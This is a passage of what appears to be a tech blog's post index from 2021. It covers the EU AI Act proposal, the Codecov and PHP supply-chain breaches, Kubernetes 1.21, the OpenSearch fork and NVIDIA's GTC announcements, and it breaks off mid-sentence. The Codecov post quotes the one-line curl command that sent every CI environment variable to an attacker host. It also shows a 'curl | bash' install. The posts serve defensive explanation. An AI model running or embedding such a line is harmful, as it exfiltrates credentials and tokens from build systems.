tiers: unacceptable risk (banned), high risk (heavily regulated), limited risk (transparency obligations), and minimal risk (largely unregulated). It\u0026rsquo;s a pragmatic structure, but the details of what falls into each category — and the obligations attached — are where things get interesting for engineering teams.\nThe Risk Pyramid # At the top of the pyramid, certain AI applications are outright prohibited. These include social scoring systems by governments, real-time remote biometric identification in public spaces (with narrow exceptions for law enforcement), and AI systems that exploit vulnerable groups or use subliminal manipulation. The social scoring ban is clearly aimed at preventing European versions of China\u0026rsquo;s social credit system. The broader movement toward AI regulation reflects growing concerns about uncontrolled AI deployment.\nThe \u0026ldquo;high-risk\u0026rdquo; category is where most of the regulatory weight sits, and it\u0026rsquo;s broader than you might expect. It includes AI systems used in:\nCritical infrastructure (transport, energy, water) Education (student scoring, admissions) Employment (CV screening, interview evaluation, task allocation) Essential services (credit scoring, insurance pricing) Law enforcement (risk assessment, evidence evaluation) Migration and border control (visa processing, risk assessment) Justice and democratic processes (legal research tools, election systems) If your AI system falls into any of these categories, you\u0026rsquo;re looking at mandatory requirements for risk management systems, data governance, technical documentation, record-keeping, transparency, human oversight, and robustness. That\u0026rsquo;s a significant compliance burden, and it applies before you can place the system on the EU market.\nWhat This Means for Engineering Teams # The technical requirements for high-risk AI systems are surprisingly specific for a piece of legislation. Article 10 mandates that training, validation, and testing datasets must be \u0026ldquo;relevant, representative, free of errors and complete.\u0026rdquo; Anyone who has worked with real-world ML datasets just did a spit-take — but the intent is to push teams toward better data practices, even if perfection is unrealistic.\nArticle 11 requires technical documentation that describes the development process, design specifications, and the general logic of the AI system. Article 12 mandates automatic logging of events for the system\u0026rsquo;s entire lifecycle — essentially requiring audit trails for model predictions in production.\nFor engineering teams, this translates to several concrete requirements. These governance and documentation requirements represent a shift toward accountability in AI development:\nModel documentation becomes mandatory. You\u0026rsquo;ll need to document your training data sources, preprocessing steps, model architecture choices, and evaluation metrics. If you\u0026rsquo;re already following MLOps best practices with tools like MLflow or DVC, you\u0026rsquo;re ahead of the curve. If your model training process is a Jupyter notebook on someone\u0026rsquo;s laptop, you have work to do.\nData lineage is no longer optional. The regulation requires that you can demonstrate the provenance and quality of your training data. This means implementing data versioning, tracking transformations, and maintaining records of data quality assessments. Tools like Great Expectations for data validation and DVC for data versioning become essential infrastructure.\nMonitoring and logging in production. High-risk AI systems must maintain logs that enable tracing of the system\u0026rsquo;s operation throughout its lifecycle. This goes beyond standard application logging — you need to capture inputs, outputs, and the reasoning chain of your AI system in a way that supports post-hoc analysis and auditing. The pattern of transparency and oversight mirrors broader concerns about AI safety and governance.\nHuman oversight mechanisms. The regulation requires that high-risk AI systems be designed to allow human oversight, including the ability to understand the system\u0026rsquo;s capabilities and limitations, to monitor operation, and to intervene or override. This pushes against fully autonomous decision-making and toward human-in-the-loop architectures.\nThe GDPR Parallel # If this regulatory structure feels familiar, it should. The AI Act follows the same playbook as GDPR: a European regulation with extraterritorial reach, a risk-based approach, significant fines for non-compliance (up to €30 million or 6% of global turnover), and a transition period before enforcement.\nThe GDPR parallel is instructive for predicting how the AI Act will play out. GDPR was initially dismissed by many tech companies as unenforceable or irrelevant to non-European businesses. That turned out to be wrong — GDPR reshaped global data practices because the cost of maintaining separate systems for EU and non-EU users exceeded the cost of simply complying everywhere.\nThe same dynamic is likely to play out with the AI Act. If you\u0026rsquo;re building AI systems that might be used by European customers — directly or through B2B relationships — you\u0026rsquo;ll likely end up complying with the AI Act regardless of where your company is based. The Brussels Effect is real.\nMy Take # I have mixed feelings about this proposal. On one hand, regulation of AI is necessary and overdue. We\u0026rsquo;ve seen enough examples of biased hiring algorithms, discriminatory credit scoring, and opaque automated decision-making to know that self-regulation isn\u0026rsquo;t working. The risk-based approach is sensible — not all AI needs the same level of oversight, and the regulation correctly leaves low-risk applications largely alone.\nOn the other hand, some of the technical requirements feel like they were written by people who understand AI in theory but haven\u0026rsquo;t shipped ML systems in production. The requirement for training data to be \u0026ldquo;free of errors and complete\u0026rdquo; is aspirational at best and impossible at worst. Real-world data is messy, and the art of machine learning is partly about building systems that perform well despite imperfect data.\nThe biggest concern I have is the pace of legislation versus the pace of technology. This proposal will likely take two to three years to become law, plus another transition period. By then, the AI landscape will look very different from today. The challenge for regulators is writing rules that are specific enough to be enforceable but flexible enough to remain relevant as the technology evolves.\nFor developers, my advice is straightforward: don\u0026rsquo;t wait for the final text. Start implementing good MLOps practices now — model documentation, data lineage tracking, production monitoring, and human oversight mechanisms. These aren\u0026rsquo;t just compliance requirements; they\u0026rsquo;re engineering best practices that will make your AI systems more reliable and trustworthy regardless of what the regulation ultimately says.\n","date":"22 April 2021","externalUrl":null,"permalink":"/posts/210422-eu-ai-act-proposal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The European Commission has proposed the AI Act, the world’s first comprehensive regulatory framework for artificial intelligence. Here’s what developers and engineering teams need to know.","title":"The EU AI Act — What the First Major AI Regulation Means for Developers","type":"posts"},{"content":"Today, Codecov disclosed that their Bash Uploader script — the tool that thousands of organizations use to send code coverage data from their CI/CD pipelines — had been compromised since January 31st. For over two months, a modified version of the script was silently exfiltrating environment variables from CI environments to an attacker-controlled server. Those environment variables typically include API keys, tokens, and credentials for services like AWS, GitHub, and internal systems. This follows the pattern established by the SolarWinds breach, where developer tools become vectors for widespread compromise.\nThis is not a minor incident. This is one of the most significant supply chain attacks targeting the developer toolchain that we\u0026rsquo;ve seen to date. The developer tools ecosystem is clearly a high-value target for attackers.\nHow the Attack Worked # The attack was elegant in its simplicity. Codecov\u0026rsquo;s Bash Uploader is a shell script that customers download and execute in their CI pipelines — typically with a curl | bash pattern or by referencing a specific version. The attacker gained access to Codecov\u0026rsquo;s Docker image creation process and modified the script to add a single line that posted all environment variables to an external server.\nThe modified line was something like:\ncurl -sm 0.5 -d \u0026#34;$(git remote -v)\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; ENV $(env)\u0026#34; http://\u0026lt;attacker-ip\u0026gt;/upload/v2 That\u0026rsquo;s it. One line. $(env) dumps every environment variable in the current shell, and curl sends it off. In a CI environment, those variables typically include:\nCloud provider credentials (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) GitHub/GitLab tokens (GITHUB_TOKEN, CI_JOB_TOKEN) Docker registry credentials Database connection strings Internal API keys Signing keys and certificates The script was downloaded directly from Codecov\u0026rsquo;s servers, so every organization running curl -s https://codecov.io/bash | bash in their CI pipeline was potentially affected. The compromised script had a different SHA-256 hash than the legitimate one, but how many organizations actually verify the hash of scripts they download in their CI pipelines? In my experience, almost none.\nThe Blast Radius # Codecov reports having over 29,000 customers. Not all of them use the Bash Uploader, but a significant portion do. The attacker had access to exfiltrated credentials for approximately 11 weeks before the breach was discovered. That\u0026rsquo;s 11 weeks of CI pipeline runs across thousands of organizations, each potentially leaking secrets.\nThe downstream impact is still being assessed. Twitch has already confirmed they were affected and are rotating credentials. HashiCorp disclosed that their GPG signing key was exposed. More organizations will follow as the investigation continues.\nThe federal investigation into this breach, reportedly involving the FBI, underscores the severity. This isn\u0026rsquo;t just a data breach — it\u0026rsquo;s a potential gateway to a cascading chain of compromises across the software industry. The cascading nature of these supply chain attacks is what makes them so dangerous.\nThe curl | bash Anti-Pattern # This incident reopens a debate that\u0026rsquo;s been simmering in the DevOps community for years: the curl | bash installation pattern. It\u0026rsquo;s ubiquitous. It\u0026rsquo;s convenient. And it\u0026rsquo;s fundamentally at odds with security.\nWhen you pipe a remote script directly into your shell, you are executing arbitrary code with the full privileges of the CI environment. You\u0026rsquo;re trusting that:\nThe remote server hasn\u0026rsquo;t been compromised The script hasn\u0026rsquo;t been modified in transit (HTTPS helps, but doesn\u0026rsquo;t protect against server compromise) The script will continue to be the same script tomorrow as it is today The server isn\u0026rsquo;t serving different content based on the User-Agent (detecting curl vs. browser) Points 1 and 3 are exactly what failed with Codecov. The server was serving a modified script, and it did so for 11 weeks before anyone noticed.\nThe alternative — downloading the script, verifying its hash or signature, committing it to your repository, and executing the local copy — is more work. But it creates a verifiable audit trail and decouples your CI security from the security posture of every third-party tool vendor in your pipeline.\nHardening Your CI/CD Pipeline # If this incident doesn\u0026rsquo;t prompt a review of your CI/CD security posture, I\u0026rsquo;m not sure what will. Here are the concrete steps every team should be taking:\nAudit your pipeline dependencies. List every external script, binary, or service that your CI pipeline downloads and executes. For each one, assess: what credentials does it have access to? What would happen if it were compromised?\nPin and verify external tools. Don\u0026rsquo;t download scripts from mutable URLs. Pin to specific versions, verify checksums, and ideally vendor the tools in your own repository. Yes, this means more maintenance. That\u0026rsquo;s the cost of security.\nMinimize CI environment variables. Only inject the credentials that a specific step actually needs. Most CI platforms support scoping secrets to specific jobs or steps. Use those features. If your coverage upload step doesn\u0026rsquo;t need your AWS credentials, don\u0026rsquo;t give it access to them.\nRotate credentials regularly. And if you used Codecov\u0026rsquo;s Bash Uploader between January 31 and April 1, 2021, rotate everything. Every credential, every token, every key that was present in those CI environments should be considered compromised.\nConsider credential helpers over environment variables. Some CI platforms support short-lived, scoped credentials that are fetched just-in-time rather than injected as environment variables. AWS OIDC federation with GitHub Actions, for instance, eliminates the need for static AWS keys entirely.\nMy Take # I\u0026rsquo;ve been setting up CI/CD pipelines for over fifteen years, and the dirty secret of the industry is that most pipelines are built for speed and convenience, not security. We treat our CI environments as trusted — running arbitrary downloaded scripts, injecting every credential we might need, and hoping that the third-party tools we depend on stay safe.\nCodecov is a reputable company. They didn\u0026rsquo;t do anything egregiously wrong in how they built their product. But the trust model was fragile by design: a single point of compromise in their build process cascaded into a potential breach of thousands of downstream organizations. That\u0026rsquo;s a systemic problem, not an individual failure.\nThe SolarWinds attack targeted the build pipeline. The PHP Git server compromise targeted the source code repository. Now Codecov shows that the CI/CD tools themselves are targets. The pattern is clear: attackers are moving up the supply chain, targeting the infrastructure that developers trust implicitly.\nWe need to stop treating our build pipelines as safe spaces. They\u0026rsquo;re attack surfaces, and they deserve the same security rigor we apply to production environments. Every external dependency in your CI pipeline is a trust relationship, and every trust relationship is a potential vulnerability.\n","date":"15 April 2021","externalUrl":null,"permalink":"/posts/210415-codecov-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Codecov’s compromised Bash Uploader script exposed CI/CD secrets for thousands of organizations, highlighting a systemic weakness in how we trust third-party tools in our build pipelines.","title":"The Codecov Breach — When Your CI Pipeline Becomes the Attack Vector","type":"posts"},{"content":"Kubernetes 1.21, codenamed \u0026ldquo;Power to the Community,\u0026rdquo; dropped today and it\u0026rsquo;s a release that tells an interesting story — not through flashy new features, but through the sheer number of items graduating to stable. Thirteen enhancements moved to GA in this release, the most in any single Kubernetes release so far. Following the foundation laid by Kubernetes 1.19, this release continues the platform\u0026rsquo;s maturation. That\u0026rsquo;s a strong signal that the project is shifting from \u0026ldquo;move fast and add features\u0026rdquo; to \u0026ldquo;stabilize what we have.\u0026rdquo;\nImmutable Secrets and ConfigMaps Hit GA # The headline feature for me is the graduation of immutable Secrets and ConfigMaps to stable. This has been in beta since 1.19, and its promotion to GA is well-deserved. The concept is simple: once you mark a Secret or ConfigMap as immutable, it cannot be updated. Any attempt to modify it will be rejected by the API server. This aligns with broader infrastructure security patterns that will continue through Kubernetes 1.22.\nWhy does this matter? First, performance. The kubelet watches for changes to Secrets and ConfigMaps that pods reference. When you have thousands of pods across hundreds of nodes, that\u0026rsquo;s an enormous amount of watch traffic hitting the API server. Immutable resources can be skipped by the watch mechanism entirely, reducing load on both the kubelet and the API server significantly. In clusters I\u0026rsquo;ve managed with several thousand pods, the API server load from Secret watches alone was non-trivial.\nSecond, safety. An immutable Secret can\u0026rsquo;t be accidentally (or maliciously) modified. In a world where a single misconfigured ConfigMap can cascade through an entire deployment, having an explicit \u0026ldquo;this is locked, don\u0026rsquo;t touch it\u0026rdquo; flag is a meaningful guard rail. You have to create a new Secret and update the pod spec to reference it — which means going through your normal deployment pipeline with all its reviews and approvals.\napiVersion: v1 kind: Secret metadata: name: database-credentials type: Opaque data: password: cGFzc3dvcmQxMjM= immutable: true It\u0026rsquo;s a small addition syntactically, but it changes the operational model in important ways.\nCronJobs Graduate to GA # CronJobs have been in beta since Kubernetes 1.8 — that\u0026rsquo;s over three years in beta. Their graduation to GA in 1.21 comes with a new controller implementation (CronJobControllerV2) that\u0026rsquo;s more reliable and performant than the old one.\nThe old CronJob controller had well-known issues with missed schedules, especially under API server load. If the controller couldn\u0026rsquo;t list jobs quickly enough, it might miss a scheduled run or, worse, create duplicate jobs. The new controller addresses these issues with a more robust scheduling algorithm and better handling of clock skew.\nFor those of us running batch workloads on Kubernetes — ETL jobs, report generation, cleanup tasks — this is a welcome stabilization. I\u0026rsquo;ve had to implement workarounds for CronJob reliability issues in production for years, including external cron schedulers that create Kubernetes Jobs directly. Being able to trust the built-in CronJob controller simplifies operations considerably.\nPodSecurityPolicy Deprecation # The flip side of all these graduations is the formal deprecation of PodSecurityPolicy (PSP). PSPs have been the primary mechanism for enforcing security constraints on pods — things like preventing privileged containers, restricting volume types, or enforcing read-only root filesystems.\nThe deprecation isn\u0026rsquo;t surprising. PSPs have been widely criticized for their confusing authorization model, difficult debugging experience, and inconsistent behavior. The Kubernetes team has been signaling this move for a while, and the replacement — a new Pod Security Admission controller — is in development.\nThe practical impact is that PSPs will continue to work through Kubernetes 1.25 (expected removal), giving teams roughly two years to migrate. But if you\u0026rsquo;re running PSPs in production, now is the time to start planning your migration strategy. The new admission controller will use a simplified model based on three predefined security profiles (Privileged, Baseline, and Restricted) rather than the current highly-configurable-but-confusing approach.\nGraceful Node Shutdown Goes Beta # Another notable feature is the graduation of graceful node shutdown to beta. When a node is shutting down (whether for maintenance, scaling down, or a cloud provider spot instance reclamation), Kubernetes can now detect the shutdown signal and gracefully terminate pods in priority order, respecting their terminationGracePeriodSeconds.\nThis is particularly relevant for cloud environments where spot/preemptible instances are common. Without graceful shutdown, pods on a terminating node get killed abruptly, potentially corrupting in-progress work or losing data. With this feature, the kubelet intercepts the systemd inhibitor lock and orchestrates a clean shutdown sequence.\nIn practice, this means your stateful workloads — databases, message queues, long-running batch jobs — have a much better chance of shutting down cleanly when the underlying node disappears. It\u0026rsquo;s the kind of feature that doesn\u0026rsquo;t make headlines but saves you from 3 AM incident calls.\nMy Take # Kubernetes 1.21 isn\u0026rsquo;t a release that will generate breathless blog posts about revolutionary new capabilities. And that\u0026rsquo;s exactly what the ecosystem needs right now. The platform has been growing features at a breakneck pace for years, and the operational reality has been that many of those features sat in alpha or beta for extended periods, leaving operators in a perpetual state of \u0026ldquo;can I actually rely on this?\u0026rdquo; The infrastructure ecosystem as a whole was demanding this stabilization after years of rapid innovation.\nHaving thirteen features graduate to stable in a single release is the Kubernetes project saying: \u0026ldquo;We\u0026rsquo;re finishing what we started.\u0026rdquo; That\u0026rsquo;s maturity. I\u0026rsquo;ve been running Kubernetes in production since the 1.6 days, and the difference in stability and operational confidence between then and now is night and day.\nThe PSP deprecation is the right call, even though it creates migration work. Sometimes you have to admit that an approach didn\u0026rsquo;t work and start fresh with the lessons learned. The new admission controller design looks much more pragmatic — three profiles instead of an infinitely configurable policy space means less room for misconfiguration.\nIf you\u0026rsquo;re running 1.20 in production, plan your upgrade path. The immutable Secrets feature alone is worth the effort for large clusters. And if you\u0026rsquo;re still relying on PSPs, start reading up on the replacement now — two years sounds like a lot of time until you\u0026rsquo;re six months out and haven\u0026rsquo;t started.\n","date":"8 April 2021","externalUrl":null,"permalink":"/posts/210408-kubernetes-1-21-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.21 lands with immutable Secrets and ConfigMaps going stable, CronJobs promoted to GA, and signals that the platform is maturing past its explosive growth phase.","title":"Kubernetes 1.21 — Immutable Secrets and the March Toward Maturity","type":"posts"},{"content":"Last weekend, the PHP project disclosed that attackers had compromised its official Git server at git.php.net, pushing two malicious commits to the php-src repository under the names of Rasmus Lerdorf and Nikita Popov. The commits were disguised as typo fixes but contained a backdoor that would allow remote code execution on any server running the tainted builds. The PHP team caught it quickly, but the implications ripple far beyond one project.\nWhat Actually Happened # On March 28th, two commits appeared in the php-src repository that looked innocuous at first glance — they were titled as minor typographical corrections. But buried in the code was a line that checked for a specific string in the HTTP User-Agent header and, if matched, executed arbitrary PHP code. It was a textbook webshell hidden in plain sight.\nThe PHP maintainers reverted the commits within hours and began investigating. The working theory is that the git.php.net server itself was compromised, rather than individual developer accounts. This is a critical distinction: it means the attacker bypassed the authentication layer at the infrastructure level.\nAs a result, the PHP project has made the decision to move its canonical repository to GitHub. The self-hosted git.php.net server, which has served the project for years, is being retired. It\u0026rsquo;s a pragmatic choice, but also a symbolic one — the era of major open-source projects self-hosting their critical infrastructure is fading.\nThe Supply Chain Trust Problem # This incident crystallizes a problem that\u0026rsquo;s been growing for years: the software supply chain is only as strong as its weakest link. PHP powers roughly 79% of websites with a known server-side language, according to W3Techs. If those malicious commits had made it into a release — even a minor one — the blast radius would have been staggering.\nWe\u0026rsquo;ve seen variations of this before. The event-stream incident in the Node.js ecosystem in 2018 showed how a single compromised package could affect thousands of downstream projects. The SolarWinds breach demonstrated nation-state-level supply chain attacks. But there\u0026rsquo;s something particularly unsettling about an attacker gaining commit access to a language\u0026rsquo;s source code itself.\nThe trust model in open-source has traditionally been built on reputation and review. Maintainers know each other, they review each other\u0026rsquo;s code, and the commit history is public. But when the server hosting that commit history is compromised, all of those safeguards evaporate. You can\u0026rsquo;t trust a code review process if the attacker can modify the code after review.\nSelf-Hosting vs. Platform Dependency # The PHP team\u0026rsquo;s move to GitHub is practical — GitHub has dedicated security teams, hardware security modules for signing, and infrastructure that most open-source projects can\u0026rsquo;t match. But it does raise questions about centralization. We\u0026rsquo;re putting an enormous amount of trust in a single platform (owned by Microsoft) to host the source code for the majority of the open-source ecosystem.\nI\u0026rsquo;ve run self-hosted Git servers for client projects over the years, and the maintenance burden is real. Keeping the server patched, managing SSH keys, monitoring for intrusions — it\u0026rsquo;s a full-time job that most open-source projects don\u0026rsquo;t have the resources for. The PHP project maintained git.php.net with a small team of volunteers, and that was apparently enough for attackers to find a way in.\nThe trade-off is clear: self-hosting gives you control but demands constant vigilance. Platform hosting gives you security infrastructure but creates a dependency. For most projects, the answer is increasingly obvious — let the platform handle infrastructure security while you focus on code quality.\nCommit Signing Matters More Than Ever # One of the key takeaways here is the importance of cryptographic commit signing. If the PHP project had enforced GPG-signed commits, the malicious pushes would have been immediately flagged — the attacker would have needed not just server access but also the private keys of the developers they were impersonating.\nGit supports commit signing natively, and GitHub can verify signatures and display a \u0026ldquo;Verified\u0026rdquo; badge. Yet adoption remains surprisingly low, even among major projects. It\u0026rsquo;s one of those security practices that everyone agrees is important but few actually implement consistently.\nIf you maintain an open-source project — or even a private one — now is the time to enforce signed commits. The tooling has gotten significantly better, and the cost of not doing it was just demonstrated in vivid detail.\nMy Take # I\u0026rsquo;ve been working with PHP since the PHP 3 days, and while I\u0026rsquo;ve moved on to other languages for most of my work, I still have a deep respect for the ecosystem. The speed of the response here was impressive — the maintainers caught the malicious commits within hours, not days or weeks. That\u0026rsquo;s the open-source model working as intended.\nBut this incident should be a wake-up call for every open-source project that self-hosts critical infrastructure. The attack surface is expanding, and volunteer maintainers are increasingly outmatched by well-resourced adversaries. Moving to platforms with professional security teams isn\u0026rsquo;t a sign of weakness — it\u0026rsquo;s an acknowledgment of reality.\nThe broader question of software supply chain security isn\u0026rsquo;t going away. If anything, attacks like this one, combined with SolarWinds and the growing catalog of compromised packages, suggest we need fundamental changes in how we verify and distribute software. Signed commits, reproducible builds, and transparent build pipelines aren\u0026rsquo;t optional anymore. They\u0026rsquo;re the minimum bar for a trustworthy software ecosystem.\n","date":"1 April 2021","externalUrl":null,"permalink":"/posts/210401-php-git-server-compromise/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Attackers pushed malicious commits to PHP’s official Git repository, exposing the fragile trust model behind open-source supply chains.","title":"PHP's Git Server Breach — A Supply Chain Wake-Up Call for Open Source","type":"posts"},{"content":"The other shoe has dropped. Yesterday, AWS announced OpenSearch, a community-driven fork of Elasticsearch and Kibana under the Apache 2.0 license. This was the widely expected response to Elastic\u0026rsquo;s January decision to relicense Elasticsearch from Apache 2.0 to the Server Side Public License (SSPL) and the Elastic License. And with it, we\u0026rsquo;ve entered a new chapter in the most significant open source licensing dispute since Redis and MongoDB went through similar transitions.\nLet me be upfront: I have mixed feelings about this, and I think anyone who doesn\u0026rsquo;t is either not paying attention or has picked a side for tribal reasons rather than technical ones.\nThe Background # In January, Elastic announced that Elasticsearch and Kibana would move from the Apache 2.0 license to a dual license under SSPL and the Elastic License. The stated reason: AWS was offering Elasticsearch as a managed service, contributing minimally back to the project, and using the Elastic trademark in ways that confused customers.\nElastic\u0026rsquo;s argument has merit. They built the product, they employ most of the contributors, and they watched a company with functionally unlimited resources offer their software as a competing managed service. The financial dynamics are real — Elastic\u0026rsquo;s business depends on selling managed Elasticsearch, and AWS\u0026rsquo;s offering directly undercuts that. This tension between open source sustainability and cloud provider capture is fundamental.\nAWS\u0026rsquo;s counterargument also has merit. Elasticsearch was Apache 2.0 licensed. That license explicitly permits this kind of use. Elastic benefited enormously from the open source ecosystem — community contributions, integrations, adoption — and changing the license after achieving dominance feels like pulling up the ladder behind you. The pattern repeats across multiple projects as commercial open source companies shift toward proprietary licensing.\nWhat OpenSearch Actually Is # OpenSearch will fork from Elasticsearch 7.10.2, the last Apache 2.0-licensed version. It will include the Open Distro for Elasticsearch features that AWS has been developing — security, alerting, SQL support, and performance tools — which were already Apache 2.0 licensed.\nThe project will live under its own governance (details still TBD), accept community contributions, and maintain compatibility with the Elasticsearch API. AWS has committed to ongoing development and is positioning this as a community project, not just an AWS product.\nFrom a technical perspective, the immediate impact is limited. Elasticsearch 7.10.2 is a solid, mature product. The codebase is well-understood, and the basic functionality isn\u0026rsquo;t going anywhere. The question is what happens over the next year or two as the Elastic-maintained Elasticsearch and the AWS-maintained OpenSearch diverge.\nThe Fork Dynamics # History tells us that forks can go several ways. Some become the dominant project (LibreOffice over OpenOffice, MariaDB gaining significant ground on MySQL). Others wither as the community consolidates around the original (the various Node.js fork attempts before the io.js merger). The outcome usually depends on where the contributors and the ecosystem go.\nAWS has resources that Elastic can\u0026rsquo;t match. They can throw engineers at OpenSearch, integrate it deeply into their cloud platform, and leverage their massive customer base. But Elastic has the brand, the existing contributor community, most of the institutional knowledge, and years of momentum.\nFor downstream users, the concern is API compatibility. If you\u0026rsquo;re building on the Elasticsearch REST API today, will your code work with both Elasticsearch and OpenSearch in two years? Probably, for the basics. But as features diverge, the compatibility surface will shrink. This is the MariaDB/MySQL story repeating itself — initially interchangeable, then increasingly not.\nThe Broader Open Source Question # This situation crystallizes a tension that\u0026rsquo;s been building in open source for years: how do you sustain open source projects when cloud providers can operationalize them at scale without proportional contribution?\nThe SSPL was MongoDB\u0026rsquo;s answer. The BSL (Business Source License) is MariaDB\u0026rsquo;s variant. Elastic\u0026rsquo;s dual license is another approach. Redis tried Commons Clause before switching to the Redis Source Available License. Each of these represents a company saying: \u0026ldquo;We can\u0026rsquo;t sustain this project if cloud providers capture most of the value.\u0026rdquo;\nAnd they\u0026rsquo;re not wrong. The economics are genuinely difficult. But the solutions all involve restricting freedoms that the community relied on, which erodes trust.\nAWS\u0026rsquo;s response — forking and maintaining an open source version — is technically within their rights and arguably good for open source purity. But it\u0026rsquo;s also an exercise of massive corporate power. A startup can\u0026rsquo;t sustain a fork of Elasticsearch. AWS can. That asymmetry matters.\nI don\u0026rsquo;t think there\u0026rsquo;s a clean \u0026ldquo;good guy / bad guy\u0026rdquo; narrative here. Elastic changed the rules after benefiting from open source adoption. AWS is using its overwhelming resources to maintain a fork that serves its business interests. Both are acting rationally within their constraints. Both are also, in different ways, making the open source ecosystem a more complicated place.\nPractical Implications # If you\u0026rsquo;re running Elasticsearch today, here\u0026rsquo;s what I\u0026rsquo;d suggest:\nDon\u0026rsquo;t panic. Nothing changes immediately. Your current Elasticsearch deployment continues to work. Evaluate your license exposure. If you\u0026rsquo;re using Elasticsearch 7.11+, you\u0026rsquo;re on the new license. Understand what that means for your use case. Watch the ecosystem. Log management tools, APM solutions, and other integrations will need to decide which project to support. Those decisions will shape the practical viability of each fork. Abstract your search layer. If you haven\u0026rsquo;t already, use an abstraction layer between your application and Elasticsearch. This gives you flexibility to switch between Elasticsearch and OpenSearch (or something else entirely) as the situation evolves. Keep an eye on OpenSearch governance. The difference between a genuine community project and an AWS-controlled project with community window dressing will become apparent in the governance model. My Take # I\u0026rsquo;ve used Elasticsearch since version 0.90. It\u0026rsquo;s been a transformative technology — making full-text search accessible to small teams was genuinely revolutionary. Watching this licensing drama play out is dispiriting, but it was probably inevitable.\nMy honest assessment: in two years, we\u0026rsquo;ll likely have two viable projects serving somewhat different audiences. Elasticsearch will cater to organizations that want the integrated Elastic Stack experience (ELK/Elastic Security/Elastic Observability). OpenSearch will serve organizations that want a managed search and analytics engine, primarily on AWS but potentially elsewhere.\nFor the open source community, the lesson is uncomfortable: build something successful enough, and the license you chose becomes your vulnerability. Whether the answer is better licenses, better business models, or better norms around cloud provider contributions, the current equilibrium clearly isn\u0026rsquo;t sustainable. Something has to give.\n","date":"25 March 2021","externalUrl":null,"permalink":"/posts/210325-aws-opensearch-elasticsearch-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon announces OpenSearch, a fork of Elasticsearch, escalating the most consequential open source licensing battle in years.","title":"AWS Forks Elasticsearch — The OpenSearch Announcement and What It Means for Open Source","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GPU Technology Conference kicked off this week, and Jensen Huang delivered his keynote from what I can only assume is the most expensive kitchen in Silicon Valley. The leather jacket is back, the ambition is cranked to eleven, and the announcements paint a clear picture of where NVIDIA thinks computing is heading.\nThe headline grabber is Grace, NVIDIA\u0026rsquo;s first datacenter CPU — an ARM-based processor designed specifically for AI workloads. But there\u0026rsquo;s a lot more under the surface: the A30 and A10 GPUs for mainstream inference, NVIDIA Base Command and Fleet Command for managing AI infrastructure, and a raft of software platform updates. Let\u0026rsquo;s unpack what actually matters for developers and infrastructure teams.\nGrace: NVIDIA\u0026rsquo;s ARM Bet # The Grace CPU is named after Grace Hopper (a choice I fully endorse), and it represents NVIDIA\u0026rsquo;s first serious foray into designing datacenter CPUs. It\u0026rsquo;s ARM-based, built on ARMv9, and optimized specifically for large-scale AI training workloads where the bottleneck is moving data between CPU and GPU memory.\nThe key technical claim: Grace will use LPDDR5x memory with a unified memory architecture that provides 10x the bandwidth of today\u0026rsquo;s NVIDIA DGX systems for CPU-GPU data transfer. For training massive models — the kind of thing that\u0026rsquo;s becoming standard in NLP — the CPU-to-GPU memory pipeline is increasingly the constraint, not raw GPU compute.\nThis is a strategic move on multiple levels. First, it reduces NVIDIA\u0026rsquo;s dependency on Intel and AMD for the CPU side of their AI platforms. Second, it positions NVIDIA in the ARM server ecosystem alongside Ampere Computing, AWS Graviton, and Fujitsu\u0026rsquo;s A64FX. Third, it lets NVIDIA optimize the entire system — CPU, GPU, memory, interconnect — as a single design, much like Apple\u0026rsquo;s M1 approach but for datacenter AI.\nGrace won\u0026rsquo;t ship until 2023, so this is a long-term signal rather than something to plan infrastructure around today. But it tells you where NVIDIA sees the industry going: tightly integrated, heterogeneous compute platforms purpose-built for AI workloads.\nThe A30 and A10: AI For the Rest of Us # While Grace grabbed the headlines, the A30 and A10 GPUs are arguably more relevant for most organizations today. These are mainstream datacenter GPUs aimed at the inference market — the part of the AI pipeline that runs trained models in production.\nThe A30 offers 24GB of HBM2e memory with multi-instance GPU (MIG) support, letting you partition a single GPU into multiple isolated instances. For inference serving, this is significant: you can run multiple models or serve multiple tenants on a single GPU without interference.\nThe A10 targets both inference and graphics workloads, making it a versatile option for organizations that need both AI serving and virtual desktop infrastructure. At 24GB GDDR6, it\u0026rsquo;s positioned as a cost-effective step up from T4 cards.\nWhat I find interesting about these announcements is the clear message: NVIDIA is moving beyond selling GPUs to selling AI platforms. The hardware is increasingly just the foundation for a software ecosystem that includes CUDA, TensorRT, Triton Inference Server, and now the management tools (Base Command, Fleet Command) that enterprises need to operationalize AI.\nSoftware Platform: Triton and Beyond # Speaking of software, the Triton Inference Server updates deserve attention. Triton is NVIDIA\u0026rsquo;s open-source inference serving framework, and it\u0026rsquo;s becoming genuinely good. Version 2.8 adds support for running on CPUs (not just GPUs), model ensembles, and improved auto-scaling.\nFor teams that are deploying ML models in production, the inference serving layer is often the most painful part of the stack. You\u0026rsquo;ve got your beautifully trained model, and now you need to serve it with low latency, handle batching efficiently, manage model versions, and scale appropriately. Triton handles most of this, and the fact that it\u0026rsquo;s open-source makes it a viable option even if you\u0026rsquo;re not running NVIDIA hardware for everything.\nThe pattern I\u0026rsquo;m seeing across the industry — from NVIDIA\u0026rsquo;s Triton to TensorFlow Serving to Seldon Core — is that ML inference serving is maturing into a proper infrastructure category. Two years ago, most teams were hand-rolling Flask APIs around their models. The tooling has gotten dramatically better.\nWhat This Means for Developers # If you\u0026rsquo;re a developer who doesn\u0026rsquo;t work directly with AI infrastructure, you might be wondering why you should care about GPU announcements. Here\u0026rsquo;s why: the infrastructure that NVIDIA is building isn\u0026rsquo;t just for training GPT-3 clones. It\u0026rsquo;s increasingly relevant for any application that benefits from AI-powered features.\nReal-time recommendation engines, natural language processing, computer vision, anomaly detection — these capabilities are moving from \u0026ldquo;specialized AI team\u0026rdquo; territory into mainstream application development. The hardware and software platforms being announced at GTC are what make that transition possible at reasonable cost.\nThe move toward purpose-built AI infrastructure also has implications for cloud costs. Today, renting GPU instances on AWS, Azure, or GCP is expensive. As dedicated inference hardware like the A30 and A10 becomes widely available, and as software like Triton makes it easier to share 